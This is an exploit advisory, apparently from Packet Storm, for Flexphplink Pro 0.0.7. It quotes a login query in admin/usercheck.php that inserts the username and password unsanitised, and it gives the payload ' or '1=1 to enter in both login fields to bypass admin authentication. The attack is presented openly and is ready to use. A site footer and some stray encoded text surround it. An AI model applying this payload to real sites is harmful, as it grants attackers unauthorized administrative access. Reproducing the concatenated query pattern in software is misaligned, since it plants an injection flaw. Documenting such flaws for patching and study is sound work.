Flexphplink 0.0.x suffers from a remote SQL injection vulnerability that allows for authentication bypass.
8a94c826249dfd3f0f86dff6520695d8220efe7d1391e373cc8aa5ed24ea4f78#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: https://w00tz0ne.altervista.org/index.php
Cms: Flexphplink Pro
Version: 0.0.7
Download: https://www.china-on-site.com/flexphplink/downloads.html
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
Greetz: Visit My Site Pls :P
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed